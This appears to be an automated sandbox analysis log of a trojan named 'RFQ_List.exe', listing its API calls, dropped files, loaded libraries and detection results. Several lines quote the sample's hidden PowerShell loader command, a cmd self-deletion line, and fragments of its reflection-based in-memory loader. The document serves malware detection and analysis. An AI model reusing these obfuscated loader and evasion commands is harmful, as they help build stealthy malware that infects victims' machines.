        Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:51907 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:51917 version: TLS 1.2
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

        System Summary

        barindex
        Source: initial sampleStatic PE information: Filename: RFQ_List.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exeJump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
        Source: C:\Users\user\Desktop\RFQ_List.exeFile created: C:\Windows\resources\Nebengeschfter.iniJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeFile created: C:\Windows\resources\0809Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeFile created: C:\Windows\Fonts\thyrididae.iniJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_00404B300_2_00404B30
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_004070410_2_00407041
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_0040686A0_2_0040686A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CADE581_2_04CADE58
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0782CAB61_2_0782CAB6
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6C4706_2_24E6C470
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6C7516_2_24E6C751
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6C1906_2_24E6C190
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6B3286_2_24E6B328
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6BEB06_2_24E6BEB0
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E64AD96_2_24E64AD9
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6CA316_2_24E6CA31
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6BBD26_2_24E6BBD2
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6B4F26_2_24E6B4F2
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6C4816_2_24E6C481
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E635706_2_24E63570
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6B5016_2_24E6B501
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6C7616_2_24E6C761
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6C1A16_2_24E6C1A1
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6BEC16_2_24E6BEC1
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E668806_2_24E66880
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E698586_2_24E69858
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E64AE96_2_24E64AE9
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6CA416_2_24E6CA41
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24E6BBE16_2_24E6BBE1
        Source: RFQ_List.exeStatic PE information: invalid certificate
        Source: RFQ_List.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.evad.winEXE@11/20@4/4
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
        Source: C:\Users\user\Desktop\RFQ_List.exeFile created: C:\Users\user\AppData\Local\peritonealizingJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
        Source: C:\Users\user\Desktop\RFQ_List.exeFile created: C:\Users\user\AppData\Local\Temp\nsk7302.tmpJump to behavior
        Source: RFQ_List.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
        Source: C:\Users\user\Desktop\RFQ_List.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: RFQ_List.exeReversingLabs: Detection: 66%
        Source: RFQ_List.exeVirustotal: Detection: 35%
        Source: C:\Users\user\Desktop\RFQ_List.exeFile read: C:\Users\user\Desktop\RFQ_List.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\RFQ_List.exe "C:\Users\user\Desktop\RFQ_List.exe"
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Damascenere.lnk.0.drLNK file: ..\..\..\..\..\..\..\ProgramData\Polyhistorisk\fagbladsjournalistens.ugi
        Source: C:\Users\user\Desktop\RFQ_List.exeFile written: C:\Windows\Resources\Nebengeschfter.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: RFQ_List.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbt N source: powershell.exe, 00000001.00000002.2337305741.000000000764B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2347740691.0000000008742000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdb source: powershell.exe, 00000001.00000002.2347740691.0000000008742000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2337305741.000000000764B000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000001.00000002.2349116146.0000000009279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Stegerserne $Proving $Pasformen), (Disa @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kassevognenes = [AppDomain]::CurrentDomain.GetAssemblies()$global:s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Doleritterne)), $Computerkriminalitet).DefineDynamicModule($sovepudens, $false).DefineType($Kyllingemoren230, $tabardillo, [System.Mul
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CACA78 push eax; mov dword ptr [esp], edx1_2_04CACA8C
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CAD610 push esp; iretd 1_2_04CAD611
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CAD098 pushad ; retf 1_2_04CAD0B1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07821CF5 pushfd ; retf 1_2_07821D45
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0782DAD3 push eax; ret 1_2_0782DAED
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_091049DC push 8BD68B50h; retf 1_2_091049F4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_09104549 push 8BD38B50h; iretd 1_2_0910454E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_091047CD push 8B0600A1h; iretd 1_2_091047D2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exeJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
